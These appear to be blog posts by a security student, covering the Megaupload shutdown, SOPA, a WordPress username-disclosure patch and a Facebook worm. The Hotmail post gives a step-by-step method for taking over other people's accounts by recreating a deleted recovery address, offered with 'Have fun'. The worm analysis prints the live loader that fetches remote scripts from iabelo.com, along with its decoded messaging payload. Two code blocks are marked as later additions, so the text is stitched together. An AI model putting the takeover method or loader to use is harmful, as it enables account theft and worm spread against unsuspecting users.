How the USA Killed my Movie Nights

Since the FBI announced that Megaupload had been closed because of the illegal content it provided to its users, I have seen a lot of complaints, articles about alternatives, and Anonymous attacks against multiple websites such as Justin Bieber’s, but what is the impact on my life?

 

Since 2005 I had been using Megaupload to exchange and download (legal) files, and now I will have to use another way to exchange my files. I used Megaupload at least 4 to 5 times a day, but fortunately, as an IT security student, I never trusted Megaupload and never uploaded personal or private content. But I can imagine that some people did and lost almost everything (if it was their only backup), which I think is funny (but only because I’m evil).

But with the closing of Megaupload, and the deletion of all the illegal content on all the other websites (videobb), I’m pretty sure that many people will have much more time to spend on the fancy cool stuff they have not done since 2005.

 

  • Discovering the television again 
  • Reading Books
  • Programming a new megaWhatEverWebsite 
  • Join the Anonymous to help with the #OpMegaupload
  • Learn to hack to become Hacktivists
  • Wait 2 years before the next episode of chuck arrives in the UK
and many other fancy things.

I will probably continue to live my life until I find a decent replacement for Megaupload to download (legal …) content and to store the files that I have to exchange with my friends.

So basically the world will continue to turn (until December, as the Mayans said), but we will have to change our « download » habits.

Megaupload has been taken down by the FBI

The Megaupload website and all its related websites have just been taken down by the FBI. Megaupload is being sued for copyright infringement and is also considered by the US government to be an « international organized criminal enterprise ».

The FBI website states that megaupload.com generated 175 million dollars and caused more than half a billion dollars of harm to multiple companies and copyright owners. Some of Megaupload’s servers were located in the state of Virginia, so it was easy for the FBI to take down all the servers.

 

Seven individuals have been charged: the boss (Kim Dotcom) and his associates.

  • Finn Batato, 38, a citizen and resident of Germany, who is the chief marketing officer;
  • Julius Bencko, 35, a citizen and resident of Slovakia, who is the graphic designer;
  • Sven Echternach, 39, a citizen and resident of Germany, who is the head of business development;
  • Mathias Ortmann, 40, a citizen of Germany and resident of both Germany and Hong Kong, who is the chief technical officer, co-founder and director;
  • Andrus Nomm, 32, a citizen of Estonia and resident of both Turkey and Estonia, who is a software programmer and head of the development software division;
  • Bram van der Kolk, aka Bramos, 29, a Dutch citizen and resident of both the Netherlands and New Zealand, who oversees programming and the underlying network structure for the Mega conspiracy websites.

 

Kim, Finn, Mathias and Bram have been arrested today by New Zealand authorities, while the others are still on the run.

 

At the moment I just imagine all the people who uploaded something that does not infringe copyright, and how they feel. As a student I used Megaupload to store some data or files when I didn’t have my USB key … or some other crap, and it was easy … I also imagine all the people who had paid accounts … etc.

 

Anyway, I believe that megaupload will not come back soon and that multiple other companies which are offering the same services will have many new customers in the next couple of hours !

 

 

This Blog supports the Blackout operation and is against SOPA/PIPA

The USA is about to vote on restrictive bills called SOPA and PIPA.

These bills will allow the US government to censor websites.

To understand SOPA/PIPA  I invite you to read the following paper:

http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

and to have a look at the following video from the Anonymous group.

 

I invite you also to retweet the following link http://sopastrike.com/on-strike/

 

See you soon.

« Hacking » Friends Hotmail’s Accounts

There are a few existing ways of hacking a Hotmail account, such as brute force or the secret question/answer, but today I (and friends) found another « way » of doing it (that I had never heard of before).

Long story short :

To make it work, the hacker needs to know the « save » e-mail address and hope that this address has been deleted.

When you forget your password, it is possible to ask Hotmail to « Email me a reset link ». When clicking on this link, Hotmail shows the user the e-mail address to which it is going to send the reset link, for example:

my*****@hotmail.com

But in a few cases this e-mail address might already have been deleted by Hotmail (if you didn’t use it anymore, or if the target didn’t use it anymore). To verify that, the hacker can simply return to the following link:

« Can’t access your account » (on the sign-in page)

From there the hacker can tick the « I forgot my password » radio button. Following the link, the hacker will find the page displayed below:

And here comes the trick:

If the address does not exist anymore, the hacker will receive the following message:


If Hotmail returns this message, the trick is to « recreate » this e-mail address by creating a new account, and then restore the password of the account you wanted to get the password back for in the first place.

 

And that’s it: Hotmail will not verify whether the previous e-mail address had been deleted or not; it will simply send you the password reset link.

 

Have fun.

Patch WordPress UserName Disclosure

On 26 May, a researcher (Veronica Valero of Talsoft S.R.L.) posted a security issue affecting WordPress blogs, concerning Direct Object Reference.

A reply posted by « Zerial » on the mailing list explained another vulnerability on WordPress.

It is possible, via a simple test on the login box, to know whether a username is used on the blog. The test is pretty simple: it analyses the message returned when trying to log in to WordPress.

For example, on the following website (http://www.noktec.be/wp-admin/), while trying to log in with the user name « test » (fake):

The return message given when the account was active was :

Error: The password you entered for the username test is incorrect. Lost your password ?

 

The return message given when the account was not active was:

Error: Invalid username. Lost your password ?

This vulnerability was already reported as OSVDB 55713 in 2009 but was still active.

A patch was released by « EthicalHack3r » :

 

wp-includes/user.php:91

Change:

return new WP_Error('invalid_username', sprintf(__('ERROR: Invalid username. <a href="%s">Lost your password</a>?'), site_url('wp-login.php?action=lostpassword', 'login')));

To:

return new WP_Error( 'invalid_username', sprintf( __( 'ERROR: Invalid username and/or password.')));

and change

wp-includes/user.php:111

Change:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: The password you entered for the username %1$s is incorrect. Lost your password?' ), $username ) );

To:

return new WP_Error( 'incorrect_password', sprintf( __( 'ERROR: Invalid username and/or password.')));

( source : EthicalHack3r)
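
A regression check for the patch above, as an added example that is not part of the original post or of WordPress: it works offline on captured login error texts and reports whether they still tell existing usernames from unknown ones. The probe data and the function names are constructed for illustration.

```javascript
// Constructed probe results from a test site: `exists` is known to the tester,
// `body` is the login error text returned for that username.
const BEFORE_PATCH = [
  { username: "editor1", exists: true,
    body: "<strong>ERROR</strong>: The password you entered for the username <strong>editor1</strong> is incorrect." },
  { username: "test", exists: false,
    body: "<strong>ERROR</strong>: Invalid username." },
];
const AFTER_PATCH = [
  { username: "editor1", exists: true, body: "ERROR: Invalid username and/or password." },
  { username: "test", exists: false, body: "ERROR: Invalid username and/or password." },
];

// Reduce a response to its message template: drop markup, replace the echoed
// username by a placeholder, collapse whitespace and case. Without the
// placeholder, two probes of existing accounts would look different only
// because their names differ.
function messageTemplate(body, username) {
  let text = body.replace(/<[^>]*>/g, " ");
  if (username) text = text.split(username).join("{user}");
  return text.replace(/\s+/g, " ").trim().toLowerCase();
}

// The login form discloses account existence when some template is only ever
// seen for existing accounts, or only ever seen for unknown ones.
function findUsernameLeak(probes) {
  const templates = { known: new Set(), unknown: new Set() };
  for (const p of probes) {
    templates[p.exists ? "known" : "unknown"].add(messageTemplate(p.body, p.username));
  }
  const onlyKnown = [...templates.known].filter((t) => !templates.unknown.has(t));
  const onlyUnknown = [...templates.unknown].filter((t) => !templates.known.has(t));
  return { leaks: onlyKnown.length > 0 || onlyUnknown.length > 0, onlyKnown, onlyUnknown };
}

console.log("before patch:", findUsernameLeak(BEFORE_PATCH));
console.log("after patch: ", findUsernameLeak(AFTER_PATCH));
```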

 

And that’s it.

FaceBook worm quick and dirty review

Introduction:

Facebook is very popular around the world, and loads of « hackers » / « script kiddies » would like to send messages to your contacts for fun and profit. In this quick and dirty review, I will briefly analyse a worm that spreads on Facebook.

Analysis:

A few minutes ago, I was invited by a friend to a strange event, which told me to click on the following link :

  1. « http://stump.ws/rocibv ».
  2. « http://www.littleurl.net/a5264c »


This link was supposed to give you a trick to see « how many people visited your profile ». Instead you get this! (one event inviting all your friends to do the same, and Pseudo)


 

Once on the page, there was a field containing JavaScript, and they asked people to copy and paste it after the Facebook link, like the following: www.facebook.com/My_Malware_JS_code.


Below you can see the JavaScript code, encoded in hexadecimal (base 16):

javascript: var _0x80be=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74",
"\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74",
"\x2F\x2F\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x2E\x6A\x73",
"\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];
(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

To understand a bit better what was happening, I converted the hex to characters; you can see the result below:

javascript: var _0x80be=["src","script","createElement","//iabelo.com/e.js","appendChild","body"];(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);

Some « hackers » do not even encode it, and it looks like this:

javascript:(a=(b=document).createElement('script')).src='//icalinko.com/styll.js',b.body.appendChild(a);void(0)
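
The hex-to-character conversion above can be done statically, without pasting the snippet into a browser. The following JavaScript is an added example, not code from the original post: it decodes the escapes as text, inlines the string table and returns the script URL the loader would fetch; the function names are hypothetical.

```javascript
// Static deobfuscation: the sample is handled as text only and is never evaluated.
// SAMPLE is the hex-encoded loader quoted in the post, kept verbatim by String.raw.
const SAMPLE = String.raw`javascript: var _0x80be=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2F\x2F\x69\x61\x62\x65\x6C\x6F\x2E\x63\x6F\x6D\x2F\x65\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x80be[2]](_0x80be[1]))[_0x80be[0]]=_0x80be[3];b[_0x80be[5]][_0x80be[4]](a); void (0);`;

// Turn \xNN escapes into characters. An escaped backslash (\\) is skipped so that
// "\\x41" stays as it is; decoded quotes, backslashes and line breaks are
// re-escaped so a decoded byte cannot end the string literal it sits in.
function decodeHexEscapes(src) {
  return src.replace(/\\\\|\\x([0-9a-fA-F]{2})/g, (whole, hex) => {
    if (hex === undefined) return whole;
    const ch = String.fromCharCode(parseInt(hex, 16));
    if (ch === '"' || ch === "'" || ch === "\\") return "\\" + ch;
    if (ch === "\n") return "\\n";
    if (ch === "\r") return "\\r";
    return ch;
  });
}

// Locate `var _0x...=["...", ...]` and return its name, entries and end offset.
function readStringTable(decoded) {
  const decl = /var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[((?:"(?:[^"\\]|\\.)*"|[\s,])*)\]/.exec(decoded);
  if (!decl) return null;
  const entries = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g;
  for (let m; (m = literal.exec(decl[2])) !== null; ) entries.push(m[1]);
  return { name: decl[1], entries, end: decl.index + decl[0].length };
}

// Inline every NAME[n] lookup, then rewrite x["prop"] as x.prop.
function deobfuscate(src) {
  const decoded = decodeHexEscapes(src);
  const table = readStringTable(decoded);
  if (!table) return decoded;
  const lookup = new RegExp("\\b" + table.name + "\\[(\\d+)\\]", "g");
  return decoded
    .slice(table.end)
    .replace(/^\s*;\s*/, "")
    .replace(lookup, (whole, i) =>
      Number(i) < table.entries.length ? '"' + table.entries[Number(i)] + '"' : whole)
    .replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
}

// Script URLs the snippet would load: the indicator to block or search logs for.
function remoteScriptSources(readable) {
  const found = [];
  const assign = /\.src\s*=\s*["']((?:[^"'\\]|\\.)*)["']/g;
  for (let m; (m = assign.exec(readable)) !== null; ) found.push(m[1]);
  return found;
}

console.log(deobfuscate(SAMPLE));
console.log(remoteScriptSources(deobfuscate(SAMPLE)));
```

The output has the same shape as the unencoded variant quoted above, which is why both forms can be matched by the same `.src` extraction.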

 

I’m not a JavaScript expert, but I can read code, and this looked like a call to www.iabelo.com/e.js, which executed a remote JavaScript file. I copied it, and you can see part of it below (again mainly encoded in hex; this is not the full code).

Once decoded in readable characters it appeared like the following :

var _0x5c0f=[
"Salut %firstname%  Je viens de decouvrir que vous etiez un de mes spectateurs profil haut, vous pouvez trouver votre exemplaire a  http://stump.ws/rocibv",
"%tf% %tf% %tf% %tf% %tf% %tf%\nwtf guys, vous est apparu comme le peuple qui m'a le plus traque, vous pouvez voir votre exemplaire a http://stump.ws/rocibv",
"http://www.iabelo.com/end.php",
"J'ai appris une façon de voir qui consulte votre profil\n\nSuivez ces étapes simples pour trouver:\n\ntout ce que vous avez à faire est d'aller sur ce lien et suivez les instructions http://stump.ws/rocibv",
"Voir qui a consulte votre profil!",
"Vous devriez vraiment verifier cela. Il fonctionne vraiment!",
"C'est le nouveau code que tout le monde a parle!",
"href","location","top","GET","open","onreadystatechange","readyState","status","responseText","send","/","match","cookie",
"@[","id",":","name","]","","&","=","POST","Content-Type","application/x-www-form-urlencoded","setRequestHeader",
"div","createElement","display","style","block","position","absolute","width","%","height","left","px","textAlign","center","padding","4px","background","#FFFFFF","zIndex","innerHTML",
"&nbsp;<br/>Please wait, this can take a little while...<br/><br/>Or if you get sick of waiting, you can <a href=\"javascript:void(0);\" onclick=\"wf=0; mf();\">click here</a> (results may be less accurate)",
"appendChild","body","data","firstChild","navAccountName","getElementById","?","/ajax/choose/?__a=1","event","AsyncRequest",
"/ajax/typeahead/first_degree.php?__a=1&viewer=","&token=","&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha",
"length","push","getTime","setTime","getMonth","getDate","getFullYear","getHours",",","join","on","Create Event","new","/events/create.php","/ajax/chat/buddy_list.php?__a=1",
"substr","(",")","buddy_list","payload","nowAvailableList","random","floor","%firstname%","toLowerCase","firstName","userInfos","replace",
"/ajax/chat/send.php?__a=1","/ajax/browser/friends/?uid=","&filter=all&__a=1&__d=1","shift","fetched friends: ","home","pop","%tf%","search",
"xhpc_message_text","xhpc_message","message text: ","/ajax/updatestatus.php?__a=1","profile"];

As I said, I’m not an expert in JavaScript, but some of the quoted strings are messages that should be posted somewhere, and the others are links and JavaScript commands requesting the creation of a group and the creation of chat messages to all the contacts, as well as the browsing of all the contacts, probably to « post » the creation of the group to everybody.

My analysis of the worm will not go further because I do not have much time, but it gives an idea of « how it works » and of what may happen to people who click everywhere and copy strange links on Facebook.

 

Btw: it looks like telling people they will find out who viewed their profile is very attractive to average users, because I have received about 20 of those propositions now. If someone goes further in the analysis, let me know; I would be pleased to read a « full » article on it.

 

How to avoid this ? (conclusion)

  • Look at the kind of link pasted (if it looks strange, do not click on it).
  • If you don’t really know what is going on, ask a friend to look at it with you (before clicking on anything).
  • In this case the « French » used is really bad; this may be a very good clue!
  • Having an updated antivirus « may » / « could » / « should » help you.
  • If the link seems obvious (a daughter had sex with her [whoever]), YES, IT’S A TRAP!
  • The cake is a lie, don’t rely on it!

Please do not click on just any link; this kind of link may do many things, such as allowing people to view your pictures or retrieve information you « set » as confidential, and many other things (limited only by the imagination of the hacker).

 
